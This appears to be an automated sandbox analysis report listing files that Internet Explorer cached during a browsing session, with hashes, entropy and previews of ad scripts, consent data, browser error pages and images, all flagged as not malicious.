                                                Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[3].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):21628
                                                Entropy (8bit):5.304819777739522
                                                Encrypted:false
                                                SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                                MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                                SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                                SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                                SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\de-ch[2].json
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                Category:dropped
                                                Size (bytes):79097
                                                Entropy (8bit):5.337866393801766
                                                Encrypted:false
                                                SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
                                                MD5:408DDD452219F77E388108945DE7D0FE
                                                SHA1:C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
                                                SHA-256:197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
                                                SHA-512:17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\dnserror[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):2997
                                                Entropy (8bit):4.4885437940628465
                                                Encrypted:false
                                                SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                MD5:2DC61EB461DA1436F5D22BCE51425660
                                                SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\dnserror[2]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):2997
                                                Entropy (8bit):4.4885437940628465
                                                Encrypted:false
                                                SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                MD5:2DC61EB461DA1436F5D22BCE51425660
                                                SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\down[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                Category:dropped
                                                Size (bytes):748
                                                Entropy (8bit):7.249606135668305
                                                Encrypted:false
                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\e151e5[1].gif
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:GIF image data, version 89a, 1 x 1
                                                Category:dropped
                                                Size (bytes):43
                                                Entropy (8bit):3.122191481864228
                                                Encrypted:false
                                                SSDEEP:3:CUTxls/1h/:7lU/
                                                MD5:F8614595FBA50D96389708A4135776E4
                                                SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: GIF89a.............!.......,...........D..;
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\errorPageStrings[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):5.164796203267696
                                                Encrypted:false
                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\httpErrorPagesScripts[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):12105
                                                Entropy (8bit):5.451485481468043
                                                Encrypted:false
                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                MD5:9234071287E637F85D721463C488704C
                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\http___cdn.taboola.com_libtrc_static_thumbnails_5f3d7819fc402dab11ff0cbe39c46367[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                Category:dropped
                                                Size (bytes):15107
                                                Entropy (8bit):7.945604899362312
                                                Encrypted:false
                                                SSDEEP:384:ZvluvjbVeUIkZ9BKQ7PBfZQ9edCicC7n4S29P:ZvAvjbhxBdlKMdCe7nY
                                                MD5:09A6961E625E1651F3F490355F583DD3
                                                SHA1:22E22F85127B348E1420D4DF3C4F87CE85C17778
                                                SHA-256:BAEAB3DF91463B16F227ABA9BFFF30DCB06D29429E1E65E21C8A290236CA6E82
                                                SHA-512:F67B242FE95797D05187FF38E6D09ACCC2F778ECF0B9EE0EF8D6F75943FF71C43099DB4B6AF9A65C21F41332A46343D69D7B6DFCFBABA7A0B62D8AC3DADC1341
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF..........................................................+".."+2*(*2<66<LHLdd.............................................+".."+2*(*2<66<LHLdd.......7...."..........4................................................................Gv.Y7.e.j[K...Xu./T..V...rO3wQ........... ..Sp...Ic...cu.Z.......5L.i(R.i...v....e.=g....;M...JS.f..U.f..f.\.$...x.c.$|F..'.X]L..;.R.DdE4.b.u[K..'..W,\.i...iND....\n$...o..M<2.o(.^F.*GhI...`.R...9rM`!M(..z.Q(..L .J..<.?..Q7o+....HRp...l..9.7RUyA..=h.Z.....[/..,4:I...;8#....f..q.(..V6...N(WV4f.]YU[..8....u...t...5_...,b..I..tgI.+.}...x+-..RsZ.....i..C.k.....mr7u.....KO.R/.0.S..S3............k...Sd.....qp. ......vT.^.WE.I...6P.m,.N....iE..o?.h...Q/...Z"...q2h7 zE.0s@'.#..Q.+\....m...t.^.I......%.70L.vj.+.....U...Ex..e.oSwX..T.c.*$...h.@.zh1.~..T$.3T..$B.HhM+.b)K(c.vAZ...~B.....y.OsW....b. F..o....i.C{...g.F,3;.y...f.T..T.s*.-..J....x........I....d......P..+v...n1......x.@..|.9.U..<..I..T...&."Sf......h4(..ha
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\iab2Data[1].json
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                Category:dropped
                                                Size (bytes):242382
                                                Entropy (8bit):5.1486574437549235
                                                Encrypted:false
                                                SSDEEP:768:l3JqIW6A3pZcOkv+prD5bxLkjO68KQHamIT4Ff5+wbUk6syZ7TMwz:l3JqINA3kR4D5bxLk78KsIkfZ6hBz
                                                MD5:D76FFE379391B1C7EE0773A842843B7E
                                                SHA1:772ED93B31A368AE8548D22E72DDE24BB6E3855C
                                                SHA-256:D0EB78606C49FCD41E2032EC6CC6A985041587AAEE3AE15B6D3B693A924F08F2
                                                SHA-512:23E7888E069D05812710BF56CC76805A4E836B88F7493EC6F669F72A55D5D85AD86AD608650E708FA1861BC78A139616322D34962FD6BE0D64E0BEA0107BF4F4
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\location[1].js
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):182
                                                Entropy (8bit):4.685293041881485
                                                Encrypted:false
                                                SSDEEP:3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
                                                MD5:C4F67A4EFC37372559CD375AA74454A3
                                                SHA1:2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
                                                SHA-256:C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
                                                SHA-512:1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\tag[1].js
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):10055
                                                Entropy (8bit):5.443998211079296
                                                Encrypted:false
                                                SSDEEP:192:4EamzdxOBoOYcpxrzZp50set1XDdVYnMLiKGWdrHpOIztlomlRIkr:4EamR7Ohxr9L0HBV+MLxGWdrVY+
                                                MD5:89A48656B1A403FD1B77C8C5682B2110
                                                SHA1:5314E9541F542965B237E654A40AF9BED66540EB
                                                SHA-256:C23483E07055D45989FE4A74C6C00E47210C1552D240360D19F2D86CA3128CCE
                                                SHA-512:1C7CC0B8348B6E4114C2833F7E099DD556C53DE6E7DFFBC7B50445EE0B4991AE7F1AE1D90DB24133BF45D39755DA154DF60FDDD28501D782692C379D9C3DAF99
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: !function(){"use strict";function r(e,i,c,l){return new(c=c||Promise)(function(n,t){function o(e){try{r(l.next(e))}catch(e){t(e)}}function a(e){try{r(l.throw(e))}catch(e){t(e)}}function r(e){var t;e.done?n(e.value):((t=e.value)instanceof c?t:new c(function(e){e(t)})).then(o,a)}r((l=l.apply(e,i||[])).next())})}function i(n,o){var a,r,i,e,c={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return e={next:t(0),throw:t(1),return:t(2)},"function"==typeof Symbol&&(e[Symbol.iterator]=function(){return this}),e;function t(t){return function(e){return function(t){if(a)throw new TypeError("Generator is already executing.");for(;c;)try{if(a=1,r&&(i=2&t[0]?r.return:t[0]?r.throw||((i=r.return)&&i.call(r),0):r.next)&&!(i=i.call(r,t[1])).done)return i;switch(r=0,i&&(t=[2&t[0],i.value]),t[0]){case 0:case 1:i=t;break;case 4:return c.label++,{value:t[1],done:!1};case 5:c.label++,r=t[1],t=[0];continue;case 7:t=c.ops.pop(),c.trys.pop();continue;default:if(!(i=0<(i=c.trys).length&&
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\17-361657-68ddb2ab[1].js
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with very long lines, with no line terminators
                                                Category:dropped
                                                Size (bytes):1238
                                                Entropy (8bit):5.066474690445609
                                                Encrypted:false
                                                SSDEEP:24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
                                                MD5:7ADA9104CCDE3FDFB92233C8D389C582
                                                SHA1:4E5BA29703A7329EC3B63192DE30451272348E0D
                                                SHA-256:F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
                                                SHA-512:2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin||(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\52-478955-68ddb2ab[1].js
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                Category:dropped
                                                Size (bytes):396806
                                                Entropy (8bit):5.324119649220133
                                                Encrypted:false
                                                SSDEEP:6144:YXP9M/wSg/jgyYZw44KfhmnidDWPqIjHSjaXCr1BgxO0DkV4FcjtIuNK:CW/VonidDWPqIjHdC16tbcjut
                                                MD5:3BBA5129E3BFA05EF2B57F231B5E7A10
                                                SHA1:7CDF93AD45B9624105F0805E3BE03310F43C8B37
                                                SHA-256:270DA5C0051987EBCEDBF06B98110CEE3ADE3E9DA71A3AB5C09C404FBA09CC60
                                                SHA-512:FD976CB278DAC5AB411A0EEDE0BCA22BCFE5D244F56A7666D93C5C3C4C5C55CCBFBAB33143D399E72C9FBB66833A787E3E5114CDBC5F679449923F8867B089A0
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: var awa,behaviorKey,Perf,globalLeft,Gemini,Telemetry,utils,data,MSANTracker,deferredCanary,g_ashsC,g_hsSetup,canary;window._perfMarker&&window._perfMarker("TimeToJsBundleExecutionStart");define("jqBehavior",["jquery","viewport"],function(n){return function(t,i,r){function u(n){var t=n.length;return t>1?function(){for(var i=0;i<t;i++)n[i]()}:t?n[0]:f}function f(){}if(typeof t!="function")throw"Behavior constructor must be a function";if(i&&typeof i!="object")throw"Defaults must be an object or null";if(r&&typeof r!="object")throw"Exclude must be an object or null";return r=r||{},function(f,e,o){function c(n){n&&(typeof n.setup=="function"&&l.push(n.setup),typeof n.teardown=="function"&&a.push(n.teardown),typeof n.update=="function"&&v.push(n.update))}var h;if(o&&typeof o!="object")throw"Options must be an object or null";var s=n.extend(!0,{},i,o),l=[],a=[],v=[],y=!0;if(r.query){if(typeof f!="string")throw"Selector must be a string";c(t(f,s))}else h=n(f,e),r.each?c(t(h,s)):(y=h.length>0,
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AANf6qa[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):432
                                                Entropy (8bit):7.252548911424453
                                                Encrypted:false
                                                SSDEEP:6:6v/lhPahm7saDdLbPvjAEQhnZxqQ7FULH4hYHgjtoYFWYooCUQVHyXRTTrYm/RTy:6v/79Zb8FZxqQJ4Yhro0Lsm96d
                                                MD5:7ED73D785784B44CF3BD897AB475E5CF
                                                SHA1:47A753F5550D727F2FB5535AD77F5042E5F6D954
                                                SHA-256:EEEA2FBC7695452F186059EC6668A2C8AE469975EBBAF5140B8AC40F642AC466
                                                SHA-512:FAF9E3AF38796B906F198712772ACBF361820367BDC550076D6D89C2F474082CC79725EC81CECF661FA9EFF3316EE10853C75594D5022319EAE9D078802D9C77
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+.....bIDATx..?..a..?.3.w`.x.&..d..Q.L..LJ^.o...,....DR,.$.O.....r.ws..<.<.|..|..x..?....^..j..r...F..v<.........t.d2.^...x<b6....\.WT...L".`8.R......m.N'..`0H.T..vc...@.H$..+..~..j....N.....~.O.Z%..+..T*.r...#.....F2..X,.Z.h4..R)z..6.s:...l2...l....N>...dB6.%..i...)....q...^..n.K&..^..X,>'..dT)..v:.0D.Q.y>.#.u:.,...Z..r..../h..u....#'.v........._&^....~..ol.#....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOfNp5[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):21488
                                                Entropy (8bit):7.956074967094666
                                                Encrypted:false
                                                SSDEEP:384:NK8ca6taiPAEHF8X/lQuWgJyiaHcwnI143gZ4UTuRavxmg4hBcm0n:Nv4l8PGuWCyiaELZdCk67y
                                                MD5:766190A0D6ACA6A6D464679662CF7E37
                                                SHA1:96B3FEF16953B6A65C61E9A10D94CAE57B60D901
                                                SHA-256:1538E167FBD736AD5A25A064C203D4A4AF609028171C2BC159CB546318D8986E
                                                SHA-512:E35464583A4AE460573C68460B15B9F0369AD11D7F4401A0F502EAB3FFCAD61B5E88F2CE1BF93AC3B2460D482A73A97D63D08E56A5105FA74DA8212A2FF34775
                                                Malicious:false
                                                Reputation:unknown
